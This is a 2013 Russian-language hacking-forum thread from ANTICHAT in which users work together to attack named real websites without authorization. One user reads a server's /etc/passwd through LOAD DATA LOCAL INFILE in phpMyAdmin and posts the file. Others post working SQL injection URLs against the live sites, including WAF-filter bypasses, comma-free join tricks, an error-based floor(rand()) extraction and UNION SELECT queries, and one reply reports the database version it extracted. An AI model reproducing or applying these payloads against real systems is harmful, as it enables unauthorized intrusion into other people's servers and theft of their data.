ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.11.2013, 15:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
1297
Репутация:
0
|
|
Сообщение от chado
chado said:
Я походу вообще без прав в phpmyadmin. information_schema даже читать не могу, изменения могу вносить только в таблицу test. Думал может можно через изменение этой таблицы что нибудь да залить)
С помощью LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test вывел содержимое в таблицу:
Код:
Code:
"# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.4.1 2010/06/14 02:09:06 kensmith Exp $",
"#",
"root:*:0:0:Charlie &:/root:/bin/csh",
"toor:*:0:0:Bourne-again Superuser:/root:",
"daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin",
"operator:*:2:5:System &:/:/usr/sbin/nologin",
"bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin",
"tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin",
"kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin",
"games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin",
"news:*:8:8:News Subsystem:/:/usr/sbin/nologin",
"man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin",
"sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin",
"smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin",
"mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin",
"bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin",
"proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin",
"_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin",
"_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin",
"uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico",
"pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin",
"www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin",
"nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin",
"zeus:*:1001:0:User &:/home/zeus:/bin/csh",
"mysql:*:1002:1001:User &:/home/mysql:/bin/sh",
"foux:*:1003:1003:User &:/home/foux:/bin/sh",
"freeradius:*:1004:1004:User &:/home/freeradius:/bin/sh",
"natusik:*:1005:1005:User &:/usr/www/natusik:/bin/csh",
"roman:*:1006:1006:User &:/usr/www/romankom.ru:/bin/csh",
"roman1:*:1007:1007:User &:/usr/www/kisika.ru:/bin/csh",
"misha:*:1008:0:Mihail Tihomirov:/home/misha:/bin/csh",
Собственно вопрос, где искать пароли? * означает любой пароль? И что я смогу сделать дальше, ftp порт закрыт, mysql порт открыт но не дает соединиться с моего IP. В config.inc.php в папке \phpmyadmin\:
Код:
Code:
"$cfg['Servers'][$i]['host'] = 'localhost'; // MySQL hostname or IP address",
"$cfg['Servers'][$i]['port'] = ''; // MySQL port - leave blank for default port",
"$cfg['Servers'][$i]['socket'] = ''; // Path to the socket - leave blank for default socket",
"$cfg['Servers'][$i]['connect_type'] = 'tcp'; // How to connect to MySQL server ('tcp' or 'socket')",
"$cfg['Servers'][$i]['extension'] = 'mysql'; // The php MySQL extension to use ('mysql' or 'mysqli')",
"$cfg['Servers'][$i]['compress'] = FALSE; // Use compressed protocol for the MySQL connection",
" // (requires PHP >= 4.3.0)",
"$cfg['Servers'][$i]['controluser'] = ''; // MySQL control user settings",
" // (this user must have read-only",
"$cfg['Servers'][$i]['controlpass'] = ''; // access to the ""mysql/user""",
" // and ""mysql/db"" tables).",
" // The controluser is also",
" // used for all relational",
" // features (pmadb)",
"$cfg['Servers'][$i]['auth_type'] = 'http'; // Authentication method (config, http or cookie based)?",
"$cfg['Servers'][$i]['user'] = 'root'; // MySQL user",
"$cfg['Servers'][$i]['password'] = ''; // MySQL password (only needed",
" // with 'config' auth_type)",
|
|
|
|
24.11.2013, 16:57
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Вылажите ссылку уязвимую сего хостинга, а потестив люди скажут, что да как...
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+orde r+by+6--+f
|
|
|
24.11.2013, 19:42
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от kingbeef
kingbeef said:
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+orde r+by+6--+f
Итак, что у нас фильтруется:
1) Скобки;
2) Знак равенства;
3) Выполнение кода в комментариях /*! */ (хотя тут не совсем так)
4) &&
Не фильтрует and, or
Легитимные запросы
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+||+1 %3E1+--+
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+and+ 2%3E1+--+
Копаю дальше.
|
|
|
|
25.11.2013, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от kingbeef
kingbeef said:
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=20'+orde r+by+6--+f
Что касается Вашего первого поста. Фильтр на связку union select можно обойти следующим способом:
Сообщение от None
UNION+--+%0DSELECT
Но до раскрутки еще далеко, вырезаюся запятые. Данный фильтр обходится созданием таблицы с помощью join:
Сообщение от None
UNION+--+%0DSELECT*FROM(select 1)a join(select 2)b join(select 3)c join(select 4)d join(select 5)e join(select 6)f
Но далее видим, что фильтруются парные скобки (), так что ничего полезного взять с этого с сайта не получится.
|
|
|
|
25.11.2013, 21:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Не выкручивается, хоть ты тресни
Код:
Code:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
|
|
|
|
25.11.2013, 22:14
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Не выкручивается, хоть ты тресни
Код:
Code:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+
Тут блайнд везде. Вывод тоже не смог добиться
http://www.bch5.ru/index.phtml?topparam=22&prod_id=16264+and+1=2+unio n+select+111,222,333+--+
http://www.bch5.ru/index.phtml?topparam=20&scat=404&cat=40+and+1=1+un ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43+--+
|
|
|
|
25.11.2013, 22:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от BigBear
BigBear said:
Тут блайнд везде. Вывод тоже не смог добиться
http://www.bch5.ru/index.phtml?topparam=22&prod_id=16264+and+1=2+unio n+select+111,222,333+--+
http://www.bch5.ru/index.phtml?topparam=20&scat=404&cat=40+and+1=1+un ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43+--+
Код:
Code:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20and%20(1,1)%3E(select%20count(*),concat((select%20version()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Duplicate entry '4.1.25-log:0' - самая калечная версия
|
|
|
|
26.11.2013, 00:57
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
hostgator.com
Как вариант ->
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=-20'+union/*!12345+select*/1/*!12345,*/2/*!12345,*/3/*!12345,*/@@version/*!12345,*/5/*!12345,*/6--+
--
http://www.bch5.ru
эрорбейс не самый удобный способ, лучше нормальный вывод:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403 UNION SELECT 13717,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43 limit 1,1--+1
|
|
|
|
26.11.2013, 15:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от KolosJey
KolosJey said:
hostgator.com
Как вариант ->
http://www.radioaliancadafe.com/home.php?opradio=Pr.Patrick&d=Interna&Key=-20'+union/*!12345+select*/1/*!12345,*/2/*!12345,*/3/*!12345,*/@@version/*!12345,*/5/*!12345,*/6--+
--
http://www.bch5.ru
эрорбейс не самый удобный способ, лучше нормальный вывод:
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403 UNION SELECT 13717,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43 limit 1,1--+1
13717, что это за число, и как оно находится? объясните или дайте ссылку почитать
|
|
|
|
26.11.2013, 16:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
никак, заместо 13717 может быть любое число
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
